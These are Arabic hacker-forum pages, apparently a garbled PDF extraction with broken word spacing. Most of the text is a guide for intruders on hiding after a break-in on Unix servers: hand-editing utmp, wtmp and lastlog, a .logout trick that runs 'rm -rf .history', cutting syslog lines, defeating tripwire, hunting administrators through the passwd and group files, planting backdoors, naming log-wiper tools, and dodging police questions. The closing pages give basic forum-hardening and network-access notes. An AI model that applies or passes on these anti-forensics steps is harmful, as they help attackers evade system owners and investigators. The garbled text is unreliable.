تكون مراقب من :الشرطه ،هاكرزاخرون وانهمیتسطیعون رصدكل حركاتباستخدام<br />
وسائل حدیثه لایمكنتخیلها<br />
مثل<br />
-اجهزهتصویرتستطیعتصویرك عند بعد مئاتالامتار<br />
-نقطةلیزر مصوبه نحو غ رفتكللتصنت على مكالماتك<br />
-موجات عالیة الترددللتنص ت علىلمسات و صوت یدیك علىال!! keyborad<br />
تختل فبالطبع هذهالامكانیات من مكان لاخر و من دولهالىاخرى .. ویر ىالبع ضانهفیمااقوله مبالغه<br />
!!!لكنانتلاتعر ف ماذا یخبئلكالمستقبل !!فلماذالاتستعد منالان<br />
كماانه هناك الكثییر مناخواننا العربفي دول الخارج الذيبالفعل تتوفرفیهااجهزةالتنصت هذه<br />
على رايالمثلالمصري "امشي عدل یحتار عدوكفیك "فكلماكنتاحتیاطیا و حركاتكت حسبهابشكل<br />
ص حیح !!!ففر صاطاحتكقلیله جدا<br />
... و<br />
!!!<br />
حساباتك واشتراكاتالشخصیه<br />
:<br />
:<br />
===================<br />
هنا سأتكلم عن حساباتكالشخصیه سواءكانتفي العمل\ المدرسه\ الجامعه\ايكانفعلیكبالتالي<br />
-ابدا لاتقومباي عمل غییرقانوني ..او مشبوهب حسابتكالشخصیهالتيفیها یكوناسمكالحقیقي و<br />
هویتك وتفصیلاتكامله عنك<br />
-عمرك ماتحاولان تتصلبموقعقدتماختراقهبواسطةال telnet<br />
-یمكنكالاشت راكب حسابك الخا صفيقائمة البرید لاي موقعامني security من دون خو ف<br />
..<br />
-<br />
-<br />
-<br />
لكنكل مو هو مخت صبالهاكینج من ملفات لابدانتشفراوانهایتم مسحهافورا<br />
ابدا لاتحفظايبرامج وادواتالاختراق على الهاردیسكفي حسابكالشخصي<br />
بریدكالحقیقي لاتعطیهالالمنتث قفیهثقه عمیاء<br />
-اهتمامكبالسكیورتي لایجعلك مشبوها ..انماالاهتمام بعكسالسكیورتيهو المشكله ==
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
!<br />
- UTMP<br />
- LASTLOG<br />
للمتواجدیناونلاین حالیا<br />
تسجیل مناین جاءت هذه logins<br />
**سنتكلم عنهمباستفاضهوتعم قفیما بعد (فيجزءاخر من نفسالموضو ع<br />
(<br />
:<br />
!!<br />
كل عملیة دخولبواسطةال telnetیتمتسجیلهافي , ftp , rlogin هذهالملفات .. لابد حذ ف دخولك<br />
من هذهالملفات والا سیتممعرفةالاتي<br />
-ماذاقمتبالاختراق<br />
-مناي مكانانتقادم<br />
-كم من الوقت بقیتاونلاین..<br />
( و<br />
خطا یقعفیهالجمیعبنسبة % ٩٩٫٩<br />
..<br />
مننا ) حتىاناكنتاقعفي نفس هذا الخطا زمان ..لكن اتعلمت<br />
هوانكتمسحاللوقات logfiles<br />
علطول .. هذا مجديفي حالةانك لاتهتمبانیعر فالادمینانه هناك مخترق ماقد دخل علىالنظام ..اما<br />
اذاارد تانتشتغل شغلالمحترفین علیك الدخول و الخروج دونان یلاحظكاي شخ ص ..دون انتقوم<br />
بتغییراي شئ یلف تانتباه مدیرالنظام<br />
و لعمل ذلكتابعمعي :<br />
لاتعتمد البرامجالتي روجت علىانهالاتقومبمسح اللوقانماتقومبحذ ف دخولكفهي غییر مجدیه مثل<br />
برنامجZAP2 ZAP (or<br />
لانه یقوم بعملاصفاركاخرلوق مكانك انت و هذاایضا دلیل على وجود خطا سیلاحظه مدیرالنظام<br />
اذا علیكبالقیام بذلك یدویا<br />
عادة لابدانتكوت root لتغیروتعدلفيال ( files logباستثناء بع ض التوزیعاتالقدیمه جدا<br />
اماكنتواجد ملفاتاللوق ( defaultتختل فباختلا ف التوزیع<br />
(<br />
(<br />
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log<br />
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log<br />
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log<br />
وفي بع ض النسخالقدیمه$home/.lastlog<br />
لا تترك اثرا:<br />
=======<br />
كثییر من الهاكرز ینجحونفي عملیة حذ ف دخولهم من ملفاتاللوق<br />
و هيالملفات التيتوجد هنا<br />
/tmp and $HOME<br />
و جودال Shellفي History HOME$ مصدرقلقكبییر<br />
..لكنهم ینسونامرا هاما وقاتلا<br />
!!!<br />
:<br />
History files :<br />
sh : .sh_history<br />
csh : .history<br />
ksh : .sh_history<br />
bash: .bash_history<br />
zsh : .history<br />
Backup Files :<br />
dead.letter, *.bak, *~<br />
٥<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لكن الحل موجودایضالمسحال : files History<br />
mv .logout save.1<br />
echo rm -rf .history>.logout<br />
echo rm -rf .logout>>.logout<br />
echo mv save.1 .logout>>.logout<br />
!!!<br />
23 http://www.host.<strong>com</strong>/<br />
(<br />
..<br />
..<br />
-امور و اشیاء یجبتجنبها وال حظر منها<br />
======================<br />
لاتقومابدا بكسرايباسوردالا على encryptedكما partition علیك دائماانتتحذر مناستخدام<br />
اشتراكاتك ( اشتراكالجامعه على سبیلالمثال<br />
لانهبم نتهى البساطه یمكنان یرى ماتفعله مدیر الشبكه admin و منثم سیعر ف مالذيتقومبه و<br />
الملفات التيتستخدمهاالخ<br />
حاول دائماانتغییراساميالبرامج المشبوههلدیكیعنياحناالعرب خصوصا غاویین نسمياسماء<br />
اسامي مخیفه علىالفاضي<br />
لاتفكرفي نفسكفقط .. یعني حینانتستخدم بع ضالاشتراكاتاوال shellsالتيتسمحبالعملالخلفي<br />
backgroundلابدانتعر فانكتبطئ من سرعةالسیرفر وبالتاليتلفتالانظار<br />
حاولانلاتستخدم parametres علىقدرالمستطا ع ... على سبیلالمثالاذاارد تان تتصل منالشیل<br />
علىتیلنتلموقعمعیناو سی رفرمعینلاتقوم بعملالاتي : telnet<br />
انما ببساطه اتبع الخطوات البطیئه وهي<br />
telnet<br />
open<br />
http://www.host.<strong>com</strong>/<br />
و هكذا ..<br />
في حالةانكاخترقت سیرفرمعین منالافضلانتضع علیه backdoors مخصصهلنظام التشغیل<br />
م ش sub7هههههههههه ( و هيكثییره و موجوده مجانا علىالانترنت<br />
الجزء الرابع :التقنیات الحدیثه اليیتي یجب ملاحظتها<br />
)<br />
===============================<br />
-<br />
*******<br />
تمهید<br />
:<br />
بعدانثبتاول sniffer و خططتلبداالاختراقات .. علیكانتعر فكی فتستخدم هذهالتقنیات متعبا ما<br />
یلي<br />
-امنعتقفى اثرك مناي نو ع<br />
...<br />
!!!<br />
**********************<br />
)<br />
قد یلاحظ الادمین مدیر الشبكه ( وجودككمخترق hacker وانكاطحتباحدالمواقعلكن هذا لایهم<br />
المهمهوانهكی ف سیرصدك و عندهاكیف یمكنانیتعاملمعك<br />
لذاففي هذا الجزء سیتمتوضیحكلالاحتمالات والاسالیبالذي یمكنبها تتبعك و رصدك وایضاكی ف<br />
یمكنانتمنعها ...<br />
admin ) )<br />
*منالطبیعي (العادي )ان یسهل على مدیرالشكبه معرفة النظامالذيكانالمخترق علیه<br />
عند دخوله على شبكتهو ذلكاما عن طریق ملفاتاللوق ) هذاانكانالهاكر غبي لتركهاكماهي )او من<br />
ال output منال sniffer<br />
٥٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
او مناوامر netstatفي حالةان المخترق مازال موجودا online<br />
من اجل هذاتختاجال !! Server GateWay<br />
..<br />
A gateway server in between *هذا واحد منالكثییر من السیرفراتالتي یوجدلك حساب<br />
علیها والتيتعتبرفي منتهى السخافهفيالاستخدام وانتتحتاج لانتكون رووت علیها لتستطیعتغییر<br />
ال wtmp and lastlogs<br />
كماانه لابدان مناستخدام اكثر من gateway server وانتبدلبینهمباستمرار حتى لایتم الكش ف<br />
عنك<br />
منالشیل الذي ستخترق منه ..قمبالاتصالبال gateway server و منثم تتصلبالسیرفر المراد<br />
اختراقه<br />
تحتاج دائما<br />
باستخدامك ل Dialupیجنبكالكثییر server من المشاكل حیثانكفي غنى عن التعدیلفي ملفات<br />
اللو قبشرطانتدخلباشتراك مختل ففيكل مرهتدخلفیها علىال (= system hacked<br />
ملحوظه :اذاكنتقادر علىالاتصالبسرفیرات dialupكثییرهفلا حاجهلانتستخدم hacking<br />
serverلانه سیتغیر اثرك بتغیر الشركات المختلفهالتي تتصل من خلالها<br />
..<br />
ل root access لتغییراللوق)<br />
..<br />
==> (<br />
بالنسبهللمتواجدینفيالولایات المتحدهالامریكیه واوروبا (الدولالمتقدمه ( حتى وانقمتبما سبق (<br />
) servers dialupیمكنهمتسجیلكل اتصالتم ولدیهمارشیفات منذ سنیین هذا عددها<br />
نتیجه واختصارللنقطه السابقه موضحهبالرسمفيالصورهالتالیه:<br />
!<br />
-ایجاداي نو ع منانوا ع ملفاتاللوق lOGs مهماكانفیها منتلاعب..<br />
**************************************************<br />
:<br />
***<br />
منالهام والضروري جداانتعثر علىكل ملفاتاللوق حتىالمخفي منها ..لل حصول والعثور على هذه<br />
الملفات یمكن ذلكبهاتینالطریقتین<br />
<strong>١</strong> -ثر على جمیعالملفاتالمفتوحه :و یمكنك ذلكباستخدامبرنامج LSOFهواختصار List Open<br />
Filesو منثم یمكنالعثور علیهم والتعدیلفیهم<br />
حث عنكل الملفات التيتغیرت حد ثفیهاتغییر من بعد دخولك -<br />
(<br />
)<br />
-٢<br />
بعد دخولكقم بعمل touch /tmp/check و بعدهاقم -print" "find / -newer /tmp/check<br />
٥٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
العملیه التي سنقومبها ستاذ خالشكلالتالي :ب حث<br />
نتائج- تعدیل<br />
> -<br />
قمایضابالتشیك علىاماكنال log files الاعتیادیه usr/adm/ و var/adm/ و var/log/<br />
..<br />
اذایتمتسجیلالعملیاتفيال loghost یعني xx@loghostفانت هنافي مازق حیثانه لابد من<br />
انتخترقال loghost لتعدل ملفات اللوق<br />
یمكنتعدیلاللوق logfiles بعدة طرقابسطهاباستخداماي محرر كتابه text editor اوقم بعداسطر<br />
المل فباستخدام wc و منثم حذ فاخر <strong>١</strong>٠اسطر من<br />
"LineNumbersMinus10بالعربي ) عددالسطور مطروحا<br />
مثبت علىالسیرفر یمكنك ببساطهاستخدام acct-cleaner from<br />
zhartوهوهیعملاللازم<br />
خلال- "head :<br />
<strong>١</strong>٠ منه ) head -<br />
اذاكانبرنامج accouting<br />
(=<br />
اذاكانالنظام یستخدم wtmpx و utmpx ایضافمعالاس فعزیزانتفي ورطه !!!فانا علىاعر ف<br />
ايبرنامجللتعاملفي هذهالحاله ..لواستطع تانتبرمج واحد (للاخوهالمبرمجین )لاتنسىانتعلنابه<br />
-تحقق منlogfile syslog configuration and<br />
************************************<br />
تعتمدمعظمالبرامج علىال syslog function لتسجیلاي شئ یریدونه ..فعلیكان تتحقق من<br />
خصائ صال syslog<br />
فاذاكانتاللوقات logs لاتخزنفقط علىالجهازانما على hostsاخرى ...فیؤ سفني انك لابد من<br />
اختراق هذهhosts<br />
ملفال syslog موجودفي/etc/syslog.conf<br />
-تحقق من نوعیاتبرامجالامن المثبته<br />
******************************<br />
توجد العدید منبرامجالفح صالأمني غالبا علىالمواقع ذات الحسالأمني العالي. وتدار هذة البرامج<br />
بواسطهأداهتسمى cron و یكون مكانهاالأفتراضيأوالطبیعي هو var/spool/cron/crontabs/<br />
و هيتقومبمتابعه جمیع المدخلات<br />
.<br />
الموضوع نستخدمالأمرالتالي<br />
" crontab -l root".<br />
خاصهال Rootو الملفاتالتي یستعملها.للتحقق اللسریع من<br />
غالبا ماتكون هذه الأدوات محمله و عامله على حساب المدیر. و یكون بعضهافي مجلد ال bin/~ الخا ص<br />
به.كما یمكنان یكون هناك sinnefer موضو علأ غ را ضامنیهفي نفسالمكان.<br />
منالأدوات ال تتستعملفي مثل هذه الفحوصات الداخلیه<br />
tiger, cops, spi, tripwire, l5,<br />
binaudit, hobgoblin, s3 etc.<br />
-<br />
ینبغي علىالمقتحمأنیتأكد من وجود هذهالأدوات و التأكد منالتقاریر التيترسلها ،للتأكد منأنها لا<br />
تكشف عملیه الأقتحام<br />
یمكنكتعدیل مفات هذهالبرامجللتأكد منأنهالنتقومبالأبلا غ عنالأقتحام،و یمكنتنفیذ ذلكبطریقتین:<br />
قم بتعدیلالبرنامجبرمجیالكي لا یقومبالأبلا غ عنك(واسعه شویه دي)أوقم بأزالته وأستعملبرنامجا<br />
مزیفا<br />
-قدتضطرإلىأزالهال back door الذيأستعملته ومحاولهتحمیلهبطریقهأخر ى<br />
٥٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
-<br />
-<br />
-<br />
-تحقق من وجودالمدراءAdmins<br />
****************************<br />
منالمهمأنتجد جمیعالمدراء على الموقع ،وتحاولمعرفه ال حسابات العادیه التيیتمأستخدامها.<br />
توجد عده طرقلكشف هذهالمعلومات :<br />
قم بفح ص المل ف .forword و مدخلات الalias<br />
أفح ص مل ف ال sulog و حددالمستخدمین الذین نجحوفيتنفیذالأمر suبنجاح root<br />
أسحب مل ف ال group وأب حث عن جمیع المجموعات التيلها علاقهبالأداره root, ( admin,<br />
wheel, etc<br />
-أسحب مل ف passwdبالنسبهللمدیر لعر ضكلمات سرالمدراء<br />
یعدكل هذا ،یمكنكمعرفهكلالمدراء علىالموقع.أدخلإلى مجلداتهم الخاصه (في حاله عدمأستطاعتك<br />
،أستخدمأحد ىالأدواتالتالیه ,chid.cلأنتحال changeid.c شخصیه المستخدم) . وأفح صالملفات<br />
لمعرفه الأوامر التي یستعملونها عادة،قد یفیدك<br />
هذافيمعرفه دورالمدیر علىالموقع،أو أكتشا فمعلومات مخفیه.قم بف ح ص ملفات<br />
لمراجعهأعدادات ال aliasالتيتستخدم ، وإ ذا ماكانتأدوات<br />
أمنیه خفیه مستخدمه. و من الطبیعي طبعاأنتقوم بفح صكافه الملفات والمجلدات خاصهالمخفیه منها<br />
قدتجد بع ض الأشیاءالمفیده حقا<br />
،<br />
التالیه history/.sh_history/.bash_history<br />
.profile/.login/.bash_profile<br />
checksum checking software<br />
************************<br />
برامج checksum<br />
(هوقیمة رقمیة تُ ستعملللتأكد من خلوالبیانات منالأخطاء. هذهالقیمةتُ حسب من<br />
خلال عملیةكش ف الجمع (<br />
بع ضالمدراء ویقمونباستعمالبرامجللتحقق من حدو ثايتغییراتفي الملفات، وفي حالة حدو ثاي<br />
تغیر ، یقوم بفح ص الملفات ویستطیعاكتشافها<br />
فكی فتعر ف مااذااستخدمت هناكبرامج التحقق وايالانواعاستخدمت؟ واذاعرفتفكی فتعدلهاب حی ث<br />
تخدم مناجلك ؟<br />
هناكانوا ع عدیدة منبرامجالتحق ق ومن السهل كتابة واحدة منهابنفسك ولكن منالصعب اكتشا ف مااذا<br />
استخدمت مثلتلكالبرامج عليالملفا تللحمایة<br />
هذهاسماء بع ضالبرامج التيتقوم ب عملیةفح صchecksum<br />
SOFTWARE : STANDARD PATH : BINARY FILENAMES<br />
tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire<br />
binaudit : /usr/local/adm/audit : auditscan<br />
hobgoblin : ~user/bin : hobgoblin<br />
raudit : ~user/bin : raudit.pl<br />
l5 : <strong>com</strong>pile directory : l5<br />
... (<br />
كماتريهناكاحتمالاتكثیرة، ربماالبرنامج نفسهاوقواعدالبیانات یوجد عليجزء آخر ، مثلجزء<br />
لمضی فاو جهاز آخر ،او حتيقواعدبیاناتالتيتحملمعلومات checksumفي جهاز<br />
محمي علي الكتابة (اقرا ص CD مثلا<br />
ولكن یمكنكالقیام بعملیةفح صاستطلاعي سریعلمعرفة البرامج المستخدمة ، واذالمتستخدمففرصتك ،<br />
NTFS<br />
٥٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
واذالمتجد شي ولكنككنت متاكدا مناستخدامهم لتلكالانوا ع منالبرامج هذایعنيان الموقعاوالمزود<br />
محميبشكل جیدا (هاردلك<br />
( ویجبانلاتعبثبالملفاتابدا ..<br />
و لكن ماالعملاذا اكتشف تانهم یستخدمونتلك البرامج وبامكانكتغییرها؟؟<br />
یمكنك<br />
<strong>١</strong> -ایهامتلكالبرنامجبطرق شرعيبانهتمتغییر مل ف مابشكلقانوني ویتمتحدیثقواعدالبیانات<br />
" tripwire -update /bin/target".<br />
مثلا<br />
٢ا- نكتغییرقائمةالملفاتالتيیجبف حصها وتزیلاسم الملفات المراد من القائمةفلایتمف حصها مرة<br />
اخريللتحقق ) ولكن یجبان تتاكدایضاان مل فقواعدالبیانات نفسها لایتمف حصها ب checksum<br />
حتي لایتم اكتشا فالتغییرات التيقمتبها)<br />
(<br />
حیلالمستخدمالامنیه<br />
*******************<br />
هذه ال حیل ما ندرتوجداوتستخدملكنني كتبتهافقط لاكون شملتكل شئ (لكمالالموضو ع ( ..فبع ض<br />
المستخدمین یسموناشتراكاتهم admins وبالطبع لا یریدونانیعبثفي ملفاتهماي شخ صفیقومون<br />
بعمل بع ضال حیلفي ملفاتال startupلذافدائماتحقق من .profile, .cshrc, .login, .logout<br />
الخ (ايالملفات التيتبدابنقطه<br />
الجزء الخامس<br />
(<br />
:<br />
=========<br />
ماذاتفعلانوضعتتحتالمراقبه؟<br />
***************************<br />
متىاصحبتتحتالمیكروسكوب( المراقبه منقبلالشرطهاو حتىال administratorsعلیكالقیام<br />
بخطوات هامه و سریعه حتى لایستطیعوالامساكبدلیل (برهان<br />
-ملحوظه<br />
( علیك<br />
...<br />
:انكانفياعتقادال administrators انك hackerفانت == > مذنب حتىتثبتبراته<br />
لایعني القانوناي شئلل ( admins بع ضالاوقا تاعتقدانه لا یوجدفر قبینال hackerوال<br />
انكهاكر<br />
administratorالابان مالكالكومبیوتر هوال administratorفقط<br />
فانكفورااصبحت مذنب سیقومو مباشرةبمراقبةبریدك اللكتروني و ملفاتك وانكان محتر فالادمین<br />
سیرصدكایضا هجماتكالاخرى<br />
اذاكان یمكنهم مراقبةكل هذهالاتصالات اكید ببساطه یمكنهم مراقبة خطتیلیفونك<br />
لذا فعلیك عدمالقیامباي اتصالا تفیهااخباراخترقاتك .. وان حتىارد تانتحذراصحابكفلاتخبرهم<br />
هاتفیااو ببریدالكتروني (الااذاكان مشفرا) و منالافضلانتخبرهم عندماتقابلهم وجهالوجه<br />
تمنعهم من راسالاي رسائل غییر عادیه<br />
لتؤمن نفسك علیكانتبقى على هذا الحال علىالاقل من شهرالى شهرین .. والا ستواجه مشاكل اعتقد<br />
.. و<br />
( عندمایعتقدون<br />
..<br />
..<br />
..<br />
..<br />
٥٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
انكلاتر غ ببها<br />
الجزء السادس :<br />
=========<br />
ماالذي علیكالقیامبه وایضا الذي لابد من عدمالقیامبهفي حالةانهتم القب ض علیك:<br />
**************************************************<br />
!!!! :لات<br />
**************<br />
اولا :اطلب محامیكفورا حاولبان تتذكىانت وترد علىالتحقیقبمفردك ..فاطلب محامیككي<br />
یدافع عنكهو و یطلعك على ما یجبانتذكره و ما یجبان لاتذكره نهائیا .. بعدها غالبا ما سیطلب<br />
المحامي جهازك (الكومبیوتر )باقصى سرعهب حجةاحتیاجهفيالعمل والا علیهمتحمیل جمیعالاعباء<br />
المادیه و المشاكل التيقدتحد ث عن عدكاستخدام الجهاز ..لذافانه من العملي جداان یكون عندك<br />
محامي جاهزفياي وقتقبلانتقع الفاسفيالراسو بعدهاتبدافي البح ث والتدویر<br />
ثانیا :ابدا لا تتكلمالاالشرطه !!! : لاتعطيللشرطهايمعلومات عنكاو عن زملائكب حجةان هذا<br />
سیخف فالعقاب عنك و سیخرجك منالمازق ..لان هذالن یفیدكبل سیدینكاكثر .. وانكان یجب<br />
استجوابكفاطلبانیتم هذافقط من خلال محامیك ) و هذاایضا حق من حقوقك<br />
لاتخبرابدا عناصدقاؤكلیسققطكنو ع منالشهامه ..انماایضابدخولاصحابكفي الموضوع ست سع<br />
دائرة الموضو ع و منثمتزیدالمعلومات عنك و عن جرائمك و همایضا!<br />
بع ضالدول من ضمنقانونهاانهاذالمتستطعالشرطهفكتشفیر ملفاتكاوجزء من الهارد دیسكفیمكنك<br />
بمنتهىالحریه عدمالافصاح عنها<br />
لكن بع ض الدولالاخر ىفيقانونهاانه مادامت وقعتفيالمصیده لابدانتدليلهم بكل شئفي هذه<br />
الحالهانص حكباستشارة محامیك وانكارانكلدیكاياقرا ص صلبه مشفره<br />
(<br />
الجزء السابع:<br />
========<br />
قائمهبافضلالبرامجللتخفي والاختباء:<br />
******************************<br />
Change - Changes fields of the logfile to anything you want<br />
Delete - Deletes, cuts out the entries you want<br />
Edit - real Editor for the logfile<br />
Overwrite - just Overwrites the entries with zero-value bytes.<br />
Don't use such software (f.e. zap) - it can be detected!<br />
---------------------------------------------------------------<br />
LOG MODIFIER<br />
++++++++++<br />
ah-1_0b.tar Changes the entries of accounting information<br />
clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx<br />
cloak2.c Changes the entries in utmp, wtmp and lastlog<br />
invisible.c Overwrites utmp, wtmp and lastlog with predefines values,<br />
so<br />
it's better than zap. Watch out, there are numerous inv*.c !<br />
٥٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!<br />
wzap.c Deletes entries in wtmp<br />
wtmped.c Deletes entries in wtmp<br />
zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!<br />
--------------------------------------------------------------------------------------<br />
:<br />
=========<br />
كلمه ختامیه<br />
**********<br />
!!<br />
(<br />
....<br />
الجزء الثامن<br />
لاتدعهمابدا یقبضون علیك .. دائمااجعل عیناك مفتوحان ..اعر ففي منتثق و من لا<br />
لاتفكرفي نفسكفقط (انماایضاتذكركل من حولك<br />
تمنیاتيللجمیعب حیاة ممتعه وامنه<br />
٥٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
حمایة<br />
" المنتدیات<br />
$$$$$$$$$$$$$<br />
حقوقهلشبكةالعقرب<br />
$$$$$$$$$$$$$<br />
الكلیعر فلغة php والتي یصممبهاالمنتدیات و الكلیعر فأیضاأنها ملیئةبالثغرات الكبیرة<br />
إلیك مدیرأي منتد ى ) <strong>vb</strong> ( بع ضالأساسیات التيیتمبها حمایة<br />
/ منتداك<br />
<strong>١</strong>-لاً وقبلكل شيءالمدیرالعام ضع مدیرینإثنین واحدتكتبفیهالمشاركاتوتعدیلالمنتدى وكل شيء<br />
والآخر للإحتیاط عندما یسرق المدیرالعام .<br />
٢-ميلوحةالتحكم بكلمة سرأي إفتح مل ف index.php الموجودبمجلد adminبواسطةالمفكرة و<br />
أض ف علیهكودكلمةالسر الذي هو /<br />
<br />
معتغییركلمتي<br />
User<br />
و<br />
Password<br />
-٣<br />
حقك لی س من<br />
غقائمةالأعضاءلماذا ؟؟ مثلالوكانلدیك ٣٠٠٠ عضو ووضعالزائرالكریمقائمةالأعضاءوقعد<br />
یفحطبهأصبح هناك ضغطكبیر علىالمنتد ىقدتسألونيلماذا لا نلغيقائمة الب ح ث !!لأن البحثفي<br />
٥٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
النسخ الجدیدة یكون بأكثر منثلا ثأحر ف وبهذالن یكونهناكأي ضغ ط .<br />
٤ -تكثر فتحلغة HTMLفي المنتدیاتأي إفتحهابمنتد ى واحدأوإثنینفقطلوجودالضرورة ..لماذا ؟؟<br />
لأنه یوجدكود هتمل یفسد جمیعالمواضیع التيتعتمد على هذهاللغة<br />
.<br />
٥-توقیع و ماأدراك ماالتوقیع . إ جعلهفقط یخدمالصورأماالفلا ش و الصوتفلا ....<br />
٦٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
"أمن الشبكات"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$<br />
الكاتب:الجوكر<br />
$$$$$$$$$<br />
<strong>١</strong>-عر ضلبع ض المخاطرالأمنیة التيقد تتعر ضلها الشبكة وكیفیة الوقایة منها.<br />
٢ -وص ف لعلاقة الولوجالىالشبكة بأمنها.<br />
٣ -كیفیة حمایة المواردبواسطةتراخی صالوصول.<br />
٤-شرحلمكونا ت ACL.<br />
٥-شرح لعملیةتفح صالتراخی ص.<br />
أي شبكةقدتكونعرضةللوصول غیر المرخ صلأي مما یلي:<br />
<strong>١</strong>- المعدات.<br />
- ٣ البیانات.<br />
- ٣ عملیاتالشبكة.<br />
٤- الموارد.<br />
تعتمد درجةأمن الشبكة على<br />
مدى حساسیةالبیانات المتداولة عبرالشبكة.<br />
ویتمتنظیمالأمن وفقالنو ع الشبكة ،ففي شبكاتالندللندكل جهازیتحكمفيأمنهالخا ص ،بینمایتحكم<br />
المزودفيأمن شبكات الزبونالمزود.<br />
و هناك بع ضالإجراءاتالتيتساعدفيالمحافظة علىأمنالشبكة:<br />
<strong>١</strong>- التدریبالمتقنللمستخدمین على التعامل معإجراءات الأمن.<br />
٢-التأكد منأمن المعداتوصعوبةالوصولالیها منقبل غیرالمخولین.<br />
- ٣ حمایةالأسلاكالنحاسیة وإ خفاءها عن الأعینلأنهاقدتكون عرضةللتجسس.<br />
٤-تشفیرالبیانا ت عندالحاجةأما مقاییسالتشفیر فتضعها وكالةالأمن الوطنيالأمریكیة National<br />
Security Agency (NSA).<br />
٥-تزویدالمستخدمین بأجهزة لاتحتوي على محركات أقرا ص مرنةأو مضغوطةأو حتى أقرا ص صلبة ،<br />
و تتصل هذه الأجهزةبالمزوداتباستخدام رقاقةإقلاع ROM Boot Chip و عندتشغیل هذه الأجهزة<br />
یقوم المزود بتحمیلبرنامجالإقلا عفي ذاكرة RAMللجهازلیبدأبالعمل.<br />
٦<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
٦-استخدامبرامج لتسجیل جمیعالعملیاتالتيیتمإجراؤها علىالشبكةلمراجعتها عند الضرورة.<br />
٧ -إعطاءتصاریح Permissionsللمستخدمینللوصولللبیانا ت و المعداتكل حسب طبیعة عمله و<br />
في هذه الحالة یجب مشاركةالبیانات و المعدا تللسماحللآخرینباستخدامها.<br />
٨-تزویدالمستخدمینبحقو ق Rightsتحدد الأنشطة و العملیاتالمسموحلهمإجراءها علىالنظام.<br />
هناك نظامانأساسیان لإعطاء التصاریح والحقوق<br />
- <strong>١</strong> المشاركةالمحمیة بكلمة مرور.<br />
٢ -تصاریح الوصول.<br />
:<br />
في النظام الأولیتمتعیینكلمة سرلكل منالمواردالمطلوب<br />
منقبل منلدیهكلمةالسر.<br />
مشاركتها ویتم الوصوللهذه المواردفقط<br />
كماتستطیعتحدید درجةالوصولهل هيللقراءةفقطأم وصولكاملأم وفقالكلمة السر.<br />
في النظام الثانيیتمتعیینالحقوق وإعطاءالتصاریحلكل مستخدمأو مجموعة مستخدمین ، و یكفيأن<br />
یدخل المستخدمكلمة المرور عند الدخولالى نظام التشغیللیتعر ف النظام على حقوق هذا المستخدم و<br />
التصاریحالمتوفرةله، ویعتبر هذاالنظامأكثرأمنا منالنظامالسابقویعطي مدیرالشبكةتحكماأكبر بكل<br />
مستخدم.<br />
عندإدخالالإسم وكلمةالمروریتمتم ریر هذهالمعلومات الى مدیرأمن ال حسابات Security<br />
فإ ذاكانالولوجالى جهاز Workstationفإ نالمعلوماتیتم<br />
مقارنتها معقاعدةبیانات حساباتالأمنالم حلیةفيالجهاز،أماإ ذاكانالولوجالى نطاق Domainفإن<br />
المعلوماتیتمإرسالها الىمزود SAM الذي یقارنها معقاعدةبیانات حساباتالنطاق ،فإ ذاكاناسم<br />
المستخدمأوكلمةالمرور غیر صال حینفإ ن المستخدم یمنع منالدخولالىالنظام،أماإ ذاكانا ص حی حین<br />
فإن نظام الأمن الفرعي یقومبإ صداربطاقة ولوج Accessتعر Token فالنظامبالمستخدم فترة<br />
ولوجه وتحتوي هذه البطاقة على المعلوماتالتالیة :<br />
Accounts Manager (SAM)<br />
-٢<br />
- <strong>١</strong> المعر ف الأمني (SID) Security Identifier وهو رقمفرید خا ص بكل حساب.<br />
معرفات المجموعة Group SIDs وهي التيتحددالمجموعة التي ینتميلهاالمستخدم.<br />
٣-ا لإمتیازا ت Privileges و هيتمثل الحقوق الممنوحةل حسابك.<br />
